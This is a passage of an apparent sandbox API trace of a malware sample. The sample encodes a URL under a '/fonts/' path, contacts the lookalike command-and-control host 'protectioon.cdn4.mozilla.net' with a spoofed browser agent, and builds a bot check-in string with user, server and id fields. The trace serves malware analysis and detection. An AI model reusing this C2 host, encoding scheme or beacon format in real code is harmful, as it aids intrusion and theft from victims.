_Dest=0x2c5fc56, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0231.146] _snprintf (in: _Dest=0x2c5fc8f, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0231.146] _snprintf (in: _Dest=0x2c5fd02, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0231.146] _snprintf (in: _Dest=0x2c5fd30, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0231.147] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa38 | out: hHeap=0x2860000) returned 1 [0231.147] lstrlenA (lpString="wIGcS0YfmDDIfDzUwG1Cd4dnsAOK7aWTy6svk4_2FY6JpfsTsil0VJchR3VcH7dOWMO96BotPUs4wYb5cwcLx7_2BArCy3NYXHDntQjna6vwf2M0sOljj3ZzKkzv7I9R3tvAwaSw5EOjlNF_2F03wJriQ3MaL1Z7nkennpZf4aRqzAMzdQSnJQ1w3jrZnRt9Ci1xihS7H0IaDo1v6HVOnCV462ho918HxZXDeYyyKntwqEOazxTX8GJkIyyx6rojyJ_2BiKZllaTpQUK9UrCcq58iKeFIzpNZqywwyzN2sHckONr_2FkJ") returned 309 [0231.147] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15c) returned 0x2c5fa38 [0231.147] memcpy (in: _Dst=0x2c5fa38, _Src=0x2c5fc00, _Size=0x12 | out: _Dst=0x2c5fa38) returned 0x2c5fa38 [0231.147] memcpy (in: _Dst=0x2c5fa4b, _Src=0x2c5fc12, _Size=0x9 | out: _Dst=0x2c5fa4b) returned 0x2c5fa4b [0231.147] memcpy (in: _Dst=0x2c5fa55, _Src=0x2c5fc1b, _Size=0x14 | out: _Dst=0x2c5fa55) returned 0x2c5fa55 [0231.147] memcpy (in: _Dst=0x2c5fa6a, _Src=0x2c5fc2f, _Size=0x13 | out: _Dst=0x2c5fa6a) returned 0x2c5fa6a [0231.147] memcpy (in: _Dst=0x2c5fa7e, _Src=0x2c5fc42, _Size=0x16 | out: _Dst=0x2c5fa7e) returned 0x2c5fa7e [0231.147] memcpy (in: _Dst=0x2c5fa95, _Src=0x2c5fc58, _Size=0xd | out: _Dst=0x2c5fa95) returned 0x2c5fa95 [0231.147] memcpy (in: _Dst=0x2c5faa3, _Src=0x2c5fc65, _Size=0x8 | out: _Dst=0x2c5faa3) returned 0x2c5faa3 [0231.147] memcpy (in: _Dst=0x2c5faac, _Src=0x2c5fc6d, _Size=0x17 | out: _Dst=0x2c5faac) returned 0x2c5faac [0231.147] memcpy (in: _Dst=0x2c5fac4, _Src=0x2c5fc84, _Size=0xa | out: _Dst=0x2c5fac4) returned 0x2c5fac4 [0231.147] memcpy (in: _Dst=0x2c5facf, _Src=0x2c5fc8e, _Size=0x11 | out: _Dst=0x2c5facf) returned 0x2c5facf [0231.147] memcpy (in: _Dst=0x2c5fae1, _Src=0x2c5fc9f, _Size=0xc | out: _Dst=0x2c5fae1) returned 0x2c5fae1 [0231.147] memcpy (in: _Dst=0x2c5faee, _Src=0x2c5fcab, _Size=0xb | out: _Dst=0x2c5faee) returned 0x2c5faee [0231.147] memcpy (in: _Dst=0x2c5fafa, _Src=0x2c5fcb6, _Size=0xe | out: _Dst=0x2c5fafa) returned 0x2c5fafa [0231.148] memcpy (in: _Dst=0x2c5fb09, _Src=0x2c5fcc4, _Size=0x15 | out: _Dst=0x2c5fb09) returned 0x2c5fb09 [0231.148] memcpy (in: _Dst=0x2c5fb1f, _Src=0x2c5fcd9, _Size=0x10 | out: _Dst=0x2c5fb1f) returned 0x2c5fb1f [0231.148] memcpy (in: _Dst=0x2c5fb30, _Src=0x2c5fce9, _Size=0xf | out: _Dst=0x2c5fb30) returned 0x2c5fb30 [0231.148] memcpy (in: _Dst=0x2c5fb40, _Src=0x2c5fcf8, _Size=0x12 | out: _Dst=0x2c5fb40) returned 0x2c5fb40 [0231.148] memcpy (in: _Dst=0x2c5fb53, _Src=0x2c5fd0a, _Size=0x9 | out: _Dst=0x2c5fb53) returned 0x2c5fb53 [0231.148] memcpy (in: _Dst=0x2c5fb5d, _Src=0x2c5fd13, _Size=0x14 | out: _Dst=0x2c5fb5d) returned 0x2c5fb5d [0231.148] memcpy (in: _Dst=0x2c5fb72, _Src=0x2c5fd27, _Size=0xb | out: _Dst=0x2c5fb72) returned 0x2c5fb72 [0231.148] memcpy (in: _Dst=0x2c5fb7e, _Src=0x2c5fd32, _Size=0x4 | out: _Dst=0x2c5fb7e) returned 0x2c5fb7e [0231.149] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fc00 | out: hHeap=0x2860000) returned 1 [0231.149] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b48 | out: hHeap=0x2860000) returned 1 [0231.149] StrTrimA (in: psz="wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ", pszTrimChars="\r\n" | out: psz="wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ") returned 0 [0231.149] lstrlenA (lpString="/fonts/") returned 7 [0231.149] lstrlenA (lpString="wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ") returned 329 [0231.149] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x151) returned 0x2c59b28 [0231.149] lstrcpyA (in: lpString1=0x2c59b28, lpString2="/fonts/" | out: lpString1="/fonts/") returned="/fonts/" [0231.149] lstrcatA (in: lpString1="/fonts/", lpString2="wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ" | out: lpString1="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ") returned="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ" [0231.149] lstrcpyA (in: lpString1=0x2c5fa38, lpString2=".bak" | out: lpString1=".bak") returned=".bak" [0231.149] lstrcpyA (in: lpString1=0x2be00d8, lpString2="protectioon.cdn4.mozilla.net" | out: lpString1="protectioon.cdn4.mozilla.net") returned="protectioon.cdn4.mozilla.net" [0231.149] lstrcatA (in: lpString1="protectioon.cdn4.mozilla.net", lpString2="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ" | out: lpString1="protectioon.cdn4.mozilla.net/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ") returned="protectioon.cdn4.mozilla.net/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ" [0231.149] lstrcatA (in: lpString1="protectioon.cdn4.mozilla.net/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ", lpString2=".bak" | out: lpString1="protectioon.cdn4.mozilla.net/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak") returned="protectioon.cdn4.mozilla.net/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak" [0231.149] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c4 [0231.149] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x1c8 [0231.149] lstrlenA (lpString="protectioon.cdn4.mozilla.net/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak") returned 368 [0231.149] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x171) returned 0x2c5fba0 [0231.149] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x171) returned 0x2c5fd20 [0231.149] StrChrA (lpStart="protectioon.cdn4.mozilla.net/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak", wMatch=0x2f) returned="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak" [0231.149] StrChrA (lpStart="protectioon.cdn4.mozilla.net/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak", wMatch=0x3f) returned 0x0 [0231.149] memcpy (in: _Dst=0x2c5fba0, _Src=0x2be00d8, _Size=0x1c | out: _Dst=0x2c5fba0) returned 0x2c5fba0 [0231.149] lstrcpyA (in: lpString1=0x2c5fd20, lpString2="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak" | out: lpString1="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak") returned="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak" [0231.149] lstrlenA (lpString="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak") returned 340 [0231.149] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x2a9) returned 0x2be08e0 [0231.149] InternetCanonicalizeUrlA (lpszUrl="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak", lpszBuffer=0x2be08e0, lpdwBufferLength=0x11ff040, dwFlags=0x0) [0231.150] InternetCanonicalizeUrlA (in: lpszUrl="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak", lpszBuffer=0x2be08e0, lpdwBufferLength=0x11ff040, dwFlags=0x0 | out: lpszBuffer="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak", lpdwBufferLength=0x11ff040) returned 1 [0231.151] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd20 | out: hHeap=0x2860000) returned 1 [0231.151] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) [0231.151] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x10000000) returned 0xcc0004 [0231.152] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x2f7bbd) returned 0x0 [0231.152] ResetEvent (hEvent=0x1c4) returned 1 [0231.152] InternetConnectA (hInternet=0xcc0004, lpszServerName="protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) [0231.152] InternetConnectA (hInternet=0xcc0004, lpszServerName="protectioon.cdn4.mozilla.net", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x11ff074) returned 0xcc0008 [0231.152] SetEvent (hEvent=0x1c4) returned 1 [0231.152] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/fonts/wIGcS0YfmDDIfDzUwG/1Cd4dnsAO/K7aWTy6svk4_2FY6Jpfs/Tsil0VJchR3VcH7dOWM/O96BotPUs4wYb5cwcLx7_2/BArCy3NYXHDnt/Qjna6vwf/2M0sOljj3ZzKkzv7I9R3tvA/waSw5EOjlN/F_2F03wJriQ3MaL1Z/7nkennpZf4aR/qzAMzdQSnJQ/1w3jrZnRt9Ci1x/ihS7H0IaDo1v6HVOnCV46/2ho918HxZXDeYyyK/ntwqEOazxTX8GJk/Iyyx6rojyJ_2BiKZll/aTpQUK9Ur/Ccq58iKeFIzpNZqywwyz/N2sHckONr_2/FkJ.bak", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84404000, dwContext=0x11ff074) returned 0xcc000c [0231.153] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040 | out: lpBuffer=0x11ff044, lpdwBufferLength=0x11ff040) returned 1 [0231.153] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x11ff044*, dwBufferLength=0x4) returned 1 [0231.153] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x6, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0231.153] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x5, lpBuffer=0x11ff03c*, dwBufferLength=0x4) returned 1 [0231.153] ResetEvent (hEvent=0x1c4) returned 1 [0231.153] ResetEvent (hEvent=0x1c8) returned 1 [0231.153] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) [0231.153] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0231.153] GetLastError () returned 0x3e5 [0231.153] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0x0) returned 0x102 [0231.153] HttpQueryInfoA (hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) [0231.153] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0231.153] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x1c4, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0231.158] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0x0) returned 0x0 [0231.158] SetEvent (hEvent=0x1c4) returned 1 [0231.158] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x1c8, bWaitAll=0, dwMilliseconds=0xea60) returned 0x102 [0241.159] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0241.159] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0241.160] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0241.160] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0241.161] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0241.161] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0241.162] CloseHandle (hObject=0x1c4) returned 1 [0241.162] CloseHandle (hObject=0x1c8) returned 1 [0241.163] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fba0 | out: hHeap=0x2860000) returned 1 [0241.163] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be08e0 | out: hHeap=0x2860000) returned 1 [0241.164] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0241.165] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa38 | out: hHeap=0x2860000) returned 1 [0241.165] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0241.165] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0241.166] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0241.166] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) [0241.166] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0241.166] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0251.174] wsprintfA (param_1=0x11ff104, param_2="size=%u&hash=0x%08x") [0251.174] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0251.174] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0251.174] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0251.174] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0251.174] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2909149525261) returned 1 [0251.174] wsprintfA (in: param_1=0x2c5a564, 